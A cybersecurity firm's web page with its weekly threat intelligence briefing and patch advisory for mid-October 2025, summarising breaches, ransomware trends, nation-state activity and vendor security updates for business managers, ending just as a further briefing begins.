TP-Link Patches Four Omada Gateway Flaws, Two Allow Remote Code Execution

Cursor, Windsurf IDEs riddled with 94+ n-day Chromium vulnerabilities

Microsoft fixes bug preventing users from opening classic Outlook

HP pulls update that broke Microsoft Entra ID auth on some AI PCs


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 17 October 2025

Black Arrow Cyber Threat Intelligence Briefing 17 October 2025:

-CISOs Urged to Rethink Tabletop Exercises as Most Incidents Are Unrehearsed

-Co-op CEO: Cyber Responsibility Lies with Senior Leaders

-UK Government: Businesses Must Prepare for Total IT Failure

-UK Security Agency Reports Sharp Rise in Cyber Attacks

-Attackers Use Valid Credentials to Breach SonicWall VPNs

-F5 Networks Confirms Long-Term Breach by Government Hackers

-Extortion Group Publishes Data from Salesforce Customer Breaches

-Microsoft: Over Half of Cyber Attacks Driven by Extortion or Ransomware

-Ransomware Attacks Surge 36% in Q3

-North Korean Attackers Use Blockchain to Evade Detection

-Russian Cyber Attacks Against NATO States Rise by 25%

-US Authorities Seize $15 Billion in Bitcoin from Crypto Scam Network

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week the UK government has given strong and clear instructions for all business leaders to plan for a cyber attack. In particular, businesses are urged to prepare for a total failure of their IT, and the CEO of UK retailer Co-op has shared her personal experience to reinforce the message, while the UK security agency reports a sharp rise in attacks.

The fallout of recent attacks is also in the media, including for users of SonicWall and Salesforce, and the continued effects of ransomware and other attacks including by nation states as well as by criminal gangs.

These themes highlight the need for cyber resilience as well as cyber security. Contact us to discuss how to achieve this in a proportionate way, including through our impartial incident response exercise simulations that are tailored to help you better manage an incident with your chosen IT and other control providers.


Top Cyber Stories of the Last Week

CISOs Urged to Rethink Tabletop Exercises as Most Incidents Are Unrehearsed

A new report reveals that 57% of major cyber incidents involved scenarios that organisations had never rehearsed. Experts argue that tabletop exercises often focus on dramatic breaches rather than realistic, subtle attack methods like lateral movement or quiet data exfiltration. Analysts recommend tailoring exercises to the organisation’s threat profile and ensuring practical readiness, such as verifying contact lists and backup communication tools. The findings highlight the need for continuous, realistic simulations that build muscle memory and align security teams with business operations. 

Source: https://www.csoonline.com/article/4071102/cisos-must-rethink-the-tabletop-as-57-of-incidents-have-never-been-rehearsed.html

Co-op CEO: Cyber Responsibility Lies with Senior Leaders

Following a major breach affecting 6.5 million members, the CEO of UK retailer the Co-operative has called on business leaders to take direct responsibility for cyber resilience. The attack disrupted payments and operations across the group’s businesses. In a letter published in the NCSC’s annual report, she emphasised that drills are essential and urged others to plan for continuity. 

Source: https://www.publictechnology.net/2025/10/15/news/co-op-ceo-the-buck-for-cyber-stops-with-us-as-senior-leaders/

UK Government: Businesses Must Prepare for Total IT Failure

The UK National Cyber Security Centre’s annual review warns that the UK now faces four nationally significant cyber attacks per week, a 129% increase from last year. The agency urges organisations to prepare for scenarios where all IT systems are offline, including email and cloud services. Businesses should ensure their crisis plans are available in printed form, and have offline communication methods available. The report distinguishes between backups and resilience, stressing that continuity planning must assume IT failure. 

Source: https://www.fortra.com/blog/ncsc-warns-companies-prepare-screens-dark

UK Security Agency Reports Sharp Rise in Cyber Attacks

The UK’s national cyber agency has reported a significant increase in cyber attacks over the past year. Threats include ransomware and state-linked espionage. The report urges organisations to improve basic cyber hygiene and prepare for incidents that may disrupt operations.

Source: https://www.theguardian.com/technology/2025/oct/14/cyber-attacks-rise-in-past-year-uk-security-agency-says

Attackers Use Valid Credentials to Breach SonicWall VPNs

Threat actors are actively exploiting SonicWall Secure Mobile Access (SMA) appliances by using valid credentials to gain unauthorised access. Once inside, they deploy malware and establish persistence. The campaign has affected organisations across multiple sectors and demonstrates the risks of credential-based access and MFA bypass.

Source: https://securityaffairs.com/183245/hacking/attackers-exploit-valid-logins-in-sonicwall-ssl-vpn-compromise.html

F5 Networks Confirms Long-Term Breach by Government Hackers

Cyber security firm F5 Networks disclosed that government-backed hackers had persistent access to its systems, stealing source code and customer configuration data. The attackers infiltrated development environments and knowledge systems, exposing undisclosed vulnerabilities. Although no software was modified, the stolen data could help attackers exploit customer systems. The US Department of Justice allowed F5 to delay public disclosure due to national security concerns. The UK’s NCSC and US CISA have urged immediate patching of affected systems. 

Source: https://techcrunch.com/2025/10/15/cyber-giant-f5-networks-says-government-hackers-had-long-term-access-to-its-systems-stole-code-and-customer-data/

Extortion Group Publishes Data from Salesforce Customer Breaches

An extortion group known as Scattered LAPSUS$ Hunters has leaked millions of records allegedly stolen from organisations using Salesforce services. The attackers claimed to have targeted 39 Salesforce customers, but only published data from six, including Qantas, Vietnam Airlines, and GAP. The leaked information includes names, email addresses, phone numbers, dates of birth, and loyalty program details. In one case, attackers accessed data via a third-party contact centre platform. Salesforce denied involvement, stating the incident relates to past or unsubstantiated events.

Source: https://www.securityweek.com/extortion-group-leaks-millions-of-records-from-salesforce-hacks/

Microsoft: Over Half of Cyber Attacks Driven by Extortion or Ransomware

Microsoft’s latest Digital Defence Report finds that 52% of cyber attacks with known motives were financially driven, primarily through extortion and ransomware. The report highlights the growing use of AI by attackers to automate phishing, scale social engineering and develop adaptive malware. Nation-state threats remain persistent, with China, Iran, Russia and North Korea expanding their targets. Microsoft urges leaders to treat cyber security as a strategic priority and adopt phishing-resistant MFA, which can block over 99% of identity-based attacks. 

Source: https://blogs.microsoft.com/on-the-issues/2025/10/16/mddr-2025/

Ransomware Attacks Surge 36% in Q3

New data shows a 36% year-on-year rise in ransomware attacks during Q3, with 270 publicly disclosed incidents. The emergence of 18 new ransomware groups, including DEVMAN, signals growing threat diversity. Attackers are increasingly targeting sensitive data, including children’s records, and demanding record ransoms. Experts stress the need for data protection to reduce extortion leverage and discourage repeat attacks. 

Source: https://betanews.com/2025/10/16/q3-ransomware-attacks-up-36-percent-year-on-year/

North Korean Attackers Use Blockchain to Evade Detection

Researchers from Cisco Talos and Google have uncovered new malware techniques used by North Korean threat actors, including EtherHiding, which leverages public blockchains for command and control. The campaign involves fake job interviews and technical assessments that trick victims into downloading malware. The malware includes keylogging and screenshot modules, enabling persistent access and data theft. These evasive methods make takedown efforts more difficult and signal a shift in nation-state tactics.  

Source: https://cyberscoop.com/north-korea-attackers-evasive-techniques-malware/

Russian Cyber Attacks Against NATO States Rise by 25%

An analysis has found a 25% year-on-year increase in Russian cyber activity targeting NATO countries. The surge includes espionage, disruption campaigns, and attacks on smaller firms seen as entry points to larger organisations. The findings suggest that Russian state actors are expanding their operations beyond Ukraine, using cybercriminal infrastructure to mask attribution and increase reach. 

Source: https://www.theguardian.com/world/2025/oct/16/russian-cyber-attacks-against-nato-states-up-by-25-in-a-year-analysis-finds

US Authorities Seize $15 Billion in Bitcoin from Crypto Scam Network

Law enforcement agencies in the US have seized around $15 billion in Bitcoin linked to the Prince Group, a criminal organisation accused of running a vast crypto fraud and human trafficking operation. The group allegedly laundered funds via gambling/crypto-mining businesses and complex crypto transfers from forced labour and fake investment schemes. The investigation, led by the Department of Justice, uncovered a global network of illicit financial activity. This is one of the largest crypto-related seizures to date and underscores the growing use of digital assets in organised crime.

Source: https://www.helpnetsecurity.com/2025/10/15/prince-group-crypto-scam-15-billion-in-bitcoin-seized/



Threats

Ransomware, Extortion and Destructive Attacks

Q3 ransomware attacks up 36 percent year-on-year - BetaNews

Salesforce bandits run into hiding amid arrests, seizures • The Register

Extortion and ransomware drive over half of cyberattacks - Microsoft On the Issues

FBI takedown banner appears on BreachForums site as Scattered Spider promotes leak | The Record from Recorded Future News

LockBit, Qilin, DragonForce form ransomware cartel | Cybernews

Third time lucky? The FBI just took down BreachForums, again | IT Pro

Scattered Lapsus$ Hunters extortion site goes dark: What’s next? | CSO Online

Qilin Ransomware announced new victims

Microsoft Revokes 200 Fraudulent Certificates Used in Rhysida Ransomware Campaign

Microsoft disrupts ransomware attacks targeting Teams users

Ransomware Victims

Co-op CEO: ‘The buck for cyber stops with us as senior leaders’ – PublicTechnology

Extortion Group Leaks Millions of Records From Salesforce Hacks - SecurityWeek

Domains used by notorious hacking group ShinyHunters for Salesforce hacks disrupted in FBI takedown | TechRadar

Third time lucky? The FBI just took down BreachForums, again | IT Pro

Russian hackers target software used by Treasury and NHS

Russia may have been behind Jaguar Land Rover cyber attack

Qilin Ransomware announced new victims

Qantas says customer data released by cyber criminals months after cyber breach | Reuters

Clop Ransomware group claims the hack of Harvard University

Volkswagen France hit by ransomware, Qilin gang claims | Cybernews

Phishing & Email Based Attacks

ClickFix attacks are surging, and Microsoft says you are the only defense | ZDNET

77% of security leaders say they'd fire staff who fall for phishing scams, even though they've done the same thing | IT Pro

Phishing kit YYlaiyu impersonates 97 brands for fraud • The Register

Fresh Phishing Kit Innovation: Automated ClickFix Attacks

Microsoft remains the most imitated brand in phishing scams - BetaNews

KnowBe4 warns of new PayPal invoice phishing scam - IT Security Guru

Cyberattackers Target LastPass, Top Password Managers

LastPass Warns Customers It Has Not Been Hacked Amid Phishing Emails - Infosecurity Magazine

Other Social Engineering

ClickFix attacks are surging, and Microsoft says you are the only defense | ZDNET

Victims of romance fraud tricked out of £106m last year - BBC News

Banks need stricter controls to prevent romance fraud, says City regulator | Cybercrime | The Guardian

Fraud, Scams and Financial Crime

U.S. seizes $15 billion in Bitcoin linked to massive forced-labor crypto scam - Help Net Security

UK, US Sanction Southeast Asia-Based Online Scam Network - Infosecurity Magazine

Scam texts net over $1 billion for cyber gangs - how to avoid their traps | ZDNET

Phishing kit YYlaiyu impersonates 97 brands for fraud • The Register

The UK Dealer With Prosthetic Hands Brought Down by the World’s Biggest Dark Web Bust

Cybercriminals flooded the web with fake Amazon pages as Prime Day deals triggered a wave of dangerous scams | TechRadar

Massive blow to cybercriminals in the EU: law enforcement blocked over 1,400 fraudulent websites | УНН

Operation Heracles strikes blow against massive network of fraudulent crypto trading sites

UK telcos step up efforts to combat ‘epidemic’ of handset fraud

Artificial Intelligence

Rise in ‘Shadow AI’ tools raising security concerns for UK

Microsoft warns of the dangers of Shadow AI • The Register

Ukraine sees surge in AI-Powered cyberattacks by Russia-linked Threat Actors

Your browser is an AI-enabled OS, so secure it like one | TechTarget

Researchers Warn of Security Gaps in AI Browsers - Infosecurity Magazine

Everyone wants AI, but few are ready to defend it - Help Net Security

UK Firms Lose Average of £2.9m to AI Risk - Infosecurity Magazine

AI Attacks Surge as Microsoft Processes 100 Trillion Signals Daily - Infosecurity Magazine

Security risks of vibe coding and LLM assistants for developers

Teenager allegedly incriminates himself via conversation with AI chat bot | The Independent

CISOs brace for an “AI vs. AI” fight | CSO Online

2FA/MFA

Hackers can steal 2FA codes and private messages from Android phones - Ars Technica

New 'Pixnapping' attack lets hackers steal Android chats, 2FA codes in seconds | Mashable

Malware

New Rust-Based Malware "ChaosBot" Uses Discord Channels to Control Victims' PCs

Astaroth Banking Trojan Abuses GitHub to Remain Operational After Takedowns

Hackers Attacking macOS Users With Spoofed Homebrew Websites to Inject Malicious Payloads - Cyber Security News

New Stealit Malware Campaign Spreads via VPN and Game Installer Apps - Infosecurity Magazine

Massive multi-country botnet targets RDP services in the US

What a new mega-worm says about open source cybersecurity - Tech Monitor

Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in 'Zero Disco' Attacks

LinkPro Linux Rootkit Uses eBPF to Hide and Activates via Magic TCP Packets

Nation-state hackers deliver malware from “bulletproof” blockchains - Ars Technica

China's Flax Typhoon Turns Geo-Mapping into Backdoor

Bots/Botnets

New Rust-Based Malware "ChaosBot" Uses Discord Channels to Control Victims' PCs

Massive multi-country botnet targets RDP services in the US

RondoDox Botnet targets 56 flaws across 30+ device types worldwide

New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands

Mobile

Hackers can steal 2FA codes and private messages from Android phones - Ars Technica

New 'Pixnapping' attack lets hackers steal Android chats, 2FA codes in seconds | Mashable

Popular VPN app can empty bank accounts, security experts warn | The Independent

You Only Need $750 of Equipment to Pilfer Data From Satellites, Researchers Say

Researchers find a startlingly cheap way to steal your secrets from space | CyberScoop

Denial of Service/DoS/DDoS

Man Launches "World's First Waymo DDoS" by Ordering 50 Robotaxis to Dead End Street

Internet of Things – IoT

RondoDox Botnet targets 56 flaws across 30+ device types worldwide

Man Launches "World's First Waymo DDoS" by Ordering 50 Robotaxis to Dead End Street

Humanoid robot found vulnerable to Bluetooth hack, data leaks to China - Help Net Security

Data Breaches/Leaks

Cyber giant F5 Networks says government hackers had 'long-term' access to its systems, stole code and customer data | TechCrunch

US Warns of ‘Catastrophic’ Hacks After Cyber Firm F5 Breach - Bloomberg

China Accessed Classified UK Systems for a Decade, Officials Say - Bloomberg

Domains used by notorious hacking group ShinyHunters for Salesforce hacks disrupted in FBI takedown | TechRadar

Third time lucky? The FBI just took down BreachForums, again | IT Pro

Attackers exploit valid logins in SonicWall SSL VPN compromise

Prospect union tells members their data was breached in June • The Register

Capita fined £14M after 58-hour delay exposed 6.6M records • The Register

Revealed: Hundreds of passwords linked to government departments leaked on dark web | The Independent

The company Discord blamed for its recent breach says it wasn't hacked

Thousands of civil servants have password exposed for over a year in 'particularly dangerous' incident | TechRadar

Over 23 Million Victims Hit by Data Breaches in Q3 - Infosecurity Magazine

How Cybercriminal Organizations Weaponize Exposed Secrets - Security Boulevard

Spanish fashion retailer MANGO disclosed a data breach

Auction giant Sotheby’s says data breach exposed financial information

Cabinet Office rejects Cummings' claim that China breached high-level systems - BBC News

8 Auto Insurance Providers to Pay New York $19M Over Data Breaches

They were victims of a massive data breach in 2009. Their employer denied it for a decade | CBC News

Have I Been Pwned: Prosper data breach impacts 17.6 million accounts

Organised Crime & Criminal Actors

U.S. seizes $15 billion in Bitcoin linked to massive forced-labor crypto scam - Help Net Security

UK, US Sanction Southeast Asia-Based Online Scam Network - Infosecurity Magazine

Scam texts net over $1 billion for cyber gangs - how to avoid their traps | ZDNET

The UK Dealer With Prosthetic Hands Brought Down by the World’s Biggest Dark Web Bust

UK and US impose sanctions on alleged Cambodian ‘cyber-scam’ network

Cybercriminals flooded the web with fake Amazon pages as Prime Day deals triggered a wave of dangerous scams | TechRadar

Massive blow to cybercriminals in the EU: law enforcement blocked over 1,400 fraudulent websites | УНН

Cybercrime ring GXC Team dismantled in Spain, 25-year-old leader detained

PowerSchool hacker sentenced to 4 years in prison | CyberScoop

Attackers don’t linger, they strike and move on - Help Net Security

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

U.S. seizes $15 billion in Bitcoin linked to massive forced-labor crypto scam - Help Net Security

UK, US Sanction Southeast Asia-Based Online Scam Network - Infosecurity Magazine

Scam texts net over $1 billion for cyber gangs - how to avoid their traps | ZDNET

North Korean operatives spotted using evasive techniques to steal data and cryptocurrency | CyberScoop

Operation Heracles strikes blow against massive network of fraudulent crypto trading sites

Insurance

Ransomware costs soar as cyber claims decline - Insurance Post

How Ransomware’s Data Theft Evolution is Rewriting Cyber Insurance Risk Models - Security Boulevard

Cyberwar angst slowing market development - The Royal Gazette | Bermuda News, Business, Sports, Events, & Community |

Supply Chain and Third Parties

Capita fined £14M after 58-hour delay exposed 6.6M records • The Register

Russian hackers target software used by Treasury and NHS

Russia may have been behind Jaguar Land Rover cyber attack

Supply Chain Risks Lurking in VS Code Marketplaces

The company Discord blamed for its recent breach says it wasn't hacked

Why vendor risk management can’t be an afterthought

Software Supply Chain

Supply Chain Risks Lurking in VS Code Marketplaces

Astaroth Banking Trojan Abuses GitHub to Remain Operational After Takedowns

Cloud/SaaS

LinkPro Linux Rootkit Uses eBPF to Hide and Activates via Magic TCP Packets

Fresh Phishing Kit Innovation: Automated ClickFix Attacks

Microsoft investigates outage affecting Microsoft 365 apps

Microsoft Revokes 200 Fraudulent Certificates Used in Rhysida Ransomware Campaign

Microsoft disrupts ransomware attacks targeting Teams users

Outages

Microsoft investigates outage affecting Microsoft 365 apps

Identity and Access Management

The password problem we keep pretending to fix - Help Net Security

Linux and Open Source

LinkPro Linux Rootkit Uses eBPF to Hide and Activates via Magic TCP Packets

What a new mega-worm says about open source cybersecurity - Tech Monitor

Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in 'Zero Disco' Attacks

New Rootkit Campaign Exploits Cisco SNMP Flaw to Gain Persistence - Infosecurity Magazine

German state replaces Microsoft Exchange and Outlook with open-source email | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

SonicWall VPN accounts breached using stolen creds in widespread attacks

The password problem we keep pretending to fix - Help Net Security

Thousands of civil servants have password exposed for over a year in 'particularly dangerous' incident | TechRadar

New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands

Cyberattackers Target LastPass, Top Password Managers

LastPass Warns Customers It Has Not Been Hacked Amid Phishing Emails - Infosecurity Magazine

Legacy Windows Protocols Still Expose Networks to Credential Theft - Infosecurity Magazine

Revealed: Hundreds of passwords linked to government departments leaked on dark web | The Independent

Social Media

How to secure corporate social media accounts before they become a breach vector | SC Media

Regulations, Fines and Legislation

Capita fined £14M after 58-hour delay exposed 6.6M records • The Register

Banks failing to curb rise in romance fraud, says UK watchdog

Victims of romance fraud tricked out of £106m last year - BBC News

Banks need stricter controls to prevent romance fraud, says City regulator | Cybercrime | The Guardian

Ofcom fines 4chan £20K for Online Safety Act failings • The Register

Cyber Resilience Act: The Clock is Ticking for Compliance | White & Case LLP - JDSupra

Cisco faces Senate scrutiny over firewall flaws • The Register

8 Auto Insurance Providers to Pay New York $19M Over Data Breaches

The Things that Bedevil U.S. Cyber Power

The End of Cybersecurity | Foreign Affairs

Homeland Security reassigns 'hundreds' of CISA cyber staffers to support Trump's deportation crackdown | TechCrunch

Models, Frameworks and Standards

Cyber Resilience Act: The Clock is Ticking for Compliance | White & Case LLP - JDSupra

Law Enforcement Action and Take Downs

U.S. seizes $15 billion in Bitcoin linked to massive forced-labor crypto scam - Help Net Security

UK, US Sanction Southeast Asia-Based Online Scam Network - Infosecurity Magazine

Operation Heracles strikes blow against massive network of fraudulent crypto trading sites

The UK Dealer With Prosthetic Hands Brought Down by the World’s Biggest Dark Web Bust

Massive blow to cybercriminals in the EU: law enforcement blocked over 1,400 fraudulent websites | УНН

Cybercrime ring GXC Team dismantled in Spain, 25-year-old leader detained

PowerSchool hacker sentenced to 4 years in prison | CyberScoop

Domains used by notorious hacking group ShinyHunters for Salesforce hacks disrupted in FBI takedown | TechRadar

Third time lucky? The FBI just took down BreachForums, again | IT Pro

BreachForums seized, but hackers say they will still leak Salesforce data

Teenager allegedly incriminates himself via conversation with AI chat bot | The Independent

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Russian cyber-attacks against Nato states up by 25% in a year, analysis finds | Nato | The Guardian

Cyberwar angst slowing market development - The Royal Gazette | Bermuda News, Business, Sports, Events, & Community |

Nation State Actors

UK hit by record number of ‘nationally significant’ cyberattacks | The Record from Recorded Future News

Ministers urge businesses to take cyber-attacks seriously - UKTN

Ministerial letter on cyber security to leading UK companies - GOV.UK

NCSC demands action amid 50% surge in major UK cyberattacks • The Register

UK security services step up work with business to fight cyber threats

Cyber giant F5 Networks says government hackers had 'long-term' access to its systems, stole code and customer data | TechCrunch

US Warns of ‘Catastrophic’ Hacks After Cyber Firm F5 Breach - Bloomberg

F5 Says Nation-State Hackers Stole Source Code and Vulnerability Data - SecurityWeek

Thousands of customers imperiled after nation-state ransacks F5’s network - Ars Technica

Nation-state hackers deliver malware from “bulletproof” blockchains - Ars Technica

China

China and Russia posing ‘significant threat’ to UK cyberspace, experts warn | The Independent

China poses 'highly sophisticated' cyber threat to UK, NCSC warns | UK News | Sky News

Cyber-attacks rise by 50% in past year, UK security agency says | Cybercrime | The Guardian

Chinese Hackers Exploit ArcGIS Server as Backdoor for Over a Year

Netherlands seizes Chinese-owned microchip maker to protect national security

China Accessed Classified UK Systems for a Decade, Officials Say - Bloomberg

Cabinet Office rejects Cummings' claim that China breached high-level systems - BBC News

China's Flax Typhoon Turns Geo-Mapping into Backdoor

The controversy over the collapsed China spy case explained - BBC News

Badenoch demands PM address 'unanswered' China spy case questions - BBC News

Taiwan faces 2.8 million Chinese cyberattacks a day | Taiwan News | Oct. 14, 2025 10:05

Humanoid robot found vulnerable to Bluetooth hack, data leaks to China - Help Net Security

Researchers report rare intrusion by suspected Chinese hackers into Russian tech firm | The Record from Recorded Future News

Chinese Threat Group 'Jewelbug' Quietly Infiltrated Russian IT Network for Months

Phishing kit YYlaiyu impersonates 97 brands for fraud • The Register

Russia

China and Russia posing ‘significant threat’ to UK cyberspace, experts warn | The Independent

China poses 'highly sophisticated' cyber threat to UK, NCSC warns | UK News | Sky News

Cyber-attacks rise by 50% in past year, UK security agency says | Cybercrime | The Guardian

Russian cyber-attacks against Nato states up by 25% in a year, analysis finds | Nato | The Guardian

Russian hackers target software used by Treasury and NHS

Russia may have been behind Jaguar Land Rover cyber attack

Ukraine sees surge in AI-Powered cyberattacks by Russia-linked Threat Actors

Chinese cyberspies compromised Russian tech provider • The Register

Hacktivists deactivate after falling into researchers' trap • The Register

Iran

Iran is not initiating cyberattacks against any country - Mehr News Agency

North Korea

North Korean operatives spotted using evasive techniques to steal data and cryptocurrency | CyberScoop

Vulnerability Management

Final Windows 10 Patch Tuesday update rolls out as support ends

Windows 10 Still on Over 40% of Devices as It Reaches End of Support - SecurityWeek

Microsoft: Exchange 2016 and 2019 have reached end of support

CVE, CVSS scores need overhauling, argues Codific CEO • The Register

Security firms dispute credit for overlapping CVE reports

Vulnerabilities

F5 releases BIG-IP patches for stolen security vulnerabilities

Cisco faces Senate scrutiny over firewall flaws • The Register

Attackers exploit valid logins in SonicWall SSL VPN compromise

Experts Warn of Widespread SonicWall VPN Compromise Impacting Over 100 Accounts

Microsoft Defender Vulnerabilities Allow Attackers to Bypass Authentication and Upload Malicious Files

New Oracle E-Business Suite Bug Could Let Hackers Access Data Without Login

Microsoft frightful Patch Tuesday: 175+ CVEs, 3 under attack • The Register

Critical Veeam Backup RCE Vulnerabilities Let Attackers Execute Malicious Code Remotely

Cisco, Fortinet, Palo Alto Networks Devices Targeted in Coordinated Campaign - SecurityWeek

Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in 'Zero Disco' Attacks

ZDI Drops 13 Unpatched Ivanti Endpoint Manager Vulnerabilities - SecurityWeek

New 7-Zip high-severity vulnerabilities expose systems to remote attackers — users should update to version 25 ASAP | Tom's Hardware

High-Severity Vulnerabilities Patched by Fortinet and Ivanti - SecurityWeek

Adobe Patches Critical Vulnerability in Connect Collaboration Suite - SecurityWeek

CISA Flags Adobe AEM Flaw with Perfect 10.0 Score — Already Under Active Attack

Microsoft patches ASP.NET Core bug rated highly critical • The Register

Juniper patched nine critical flaws in Junos Space

SAP Patches Critical Vulnerabilities in NetWeaver, Print Service, SRM - SecurityWeek

Gladinet Patches Exploited CentreStack Vulnerability - SecurityWeek

Final Windows 10 Patch Tuesday update rolls out as support ends

Windows 10 Still on Over 40% of Devices as It Reaches End of Support - SecurityWeek

Oracle rushes out another emergency E-Business Suite patch • The Register

Secure Boot bypass risk threatens nearly 200,000 Linux Framework laptops

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.

Black Arrow Cyber Advisory 16 October 2025 - Security Updates from Microsoft, SAP, Fortinet, Ivanti and Oracle (E-Business Suite)

Executive Summary

This month’s updates span Microsoft’s regular Patch Tuesday release, SAP’s Security Patch Day, large batches from Fortinet across network and endpoint products, targeted fixes from Ivanti for enterprise mobility/secure access, and a standalone Oracle Security Alert for E-Business Suite issued on 11 October. Prioritise actively exploited Windows issues (where present), SAP high and critical security notes, Fortinet gateway/endpoint components, Ivanti EPM/EPMM/Neurons platforms, and Oracle E-Business Suite where exposure is internet-facing.

Vulnerabilities by Vendor

  • Microsoft: 173 vulnerabilities, including five critical-severity security defects and two flaws that have been exploited in the wild. The vulnerabilities affect Windows (client/server), Office/SharePoint, .NET/Visual Studio, Azure services, and Microsoft Edge (Chromium). Prioritise patches addressing any actively exploited items and Critical RCE/EoP paths in Windows and server components.

  • SAP: 16 new and updated patches as part of its monthly rollout, across on-prem and cloud product families (e.g., NetWeaver, S/4HANA, Business Objects). Prioritise High/Critical security notes and authentication/authorisation weaknesses.

  • Fortinet: 29 advisories across FortiOS/FortiProxy, FortiDLP, FortiClient, FortiIsolator, FortiPAM, FortiManager/Analyzer, FortiADC/FortiWeb and others. Prioritise High/Critical items on perimeter firewalls, proxies and endpoint agents; review PSIRT entries for products you operate.

  • Ivanti: Several updates across Endpoint Manager (EPM), Endpoint Manager Mobile (EPMM) and Neurons. Prioritise High/Critical updates for EPM and EPMM; apply the latest EPM/EPMM and Neurons updates if not yet deployed.

  • Oracle (E-Business Suite only): 1 vulnerability (Security Alert CVE-2025-61884, released 11 October 2025), affecting E-Business Suite 12.2.3–12.2.14. The vulnerability is remotely exploitable without authentication; prioritise immediate patching on any externally accessible instances.

What’s the risk to me or my business?

The presence of actively exploited zero-days and critical RCE/privilege escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.

What can I do?

Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.

Sources:
1 Microsoft — https://msrc.microsoft.com/update-guide
2 SAP — https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html
3 Fortinet — https://www.fortiguard.com/psirt
4 Ivanti — https://www.ivanti.com/blog/october-2025-security-update
5 Oracle — (E-Business Suite Security Alert CVE-2025-61884) — https://www.oracle.com/security-alerts/alert-cve-2025-61884.html

Black Arrow Cyber Threat Intelligence Briefing 10 October 2025

-CFOs Put Cyber at the Top of the Risk Agenda

-SonicWall Cloud Backup Breach Exposes Firewall Configurations

-Budgets and Skills Lag Behind Rising Attacks

-SMBs Remain Exposed to AI‑Driven Threats and Ransomware Complacency

-Digital Fraud Now Costs Firms an Average 7.7% of Revenue

-Survey Finds Attacks Hit 91% of UK Universities and 43% of Businesses

-Insurer Forecasts 40% Rise in Named Ransomware Victims by 2026

-Paying Ransoms Increasingly Fails to Restore Data

-SaaS Incidents Surge Despite High Confidence

-AI Supercharges Phishing and Stretches Defences

-Deepfake Voice Risks Highlight Identity Verification Gaps

-Insurers and Asset Managers Expand Cybersecurity Oversight

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

Our review of business and cyber security media this week highlights that cyber risk is escalating across finance, education and supply chains, with attacks growing in scale and sophistication. AI-driven threats and deepfake-enabled fraud are eroding traditional defences, while SaaS misconfigurations and legacy systems widen exposure.

Surveys reveal persistent gaps in budgets, skills and governance, leaving many organisations underprepared. Ransomware recovery rates are falling, and digital fraud now consumes a significant share of revenue.

Boards are under pressure to strengthen oversight and link leadership incentives to cyber performance, yet complacency remains a critical risk. In our work with business leaders across countries and sectors, we see the value of leaders taking command by understanding their risks and governing their resilience across people, operations and controls. Contact us to discuss how we can support your leadership through focused upskilling and governance support.

Top Cyber Stories of the Last Week

CFOs Put Cyber at the Top of the Risk Agenda

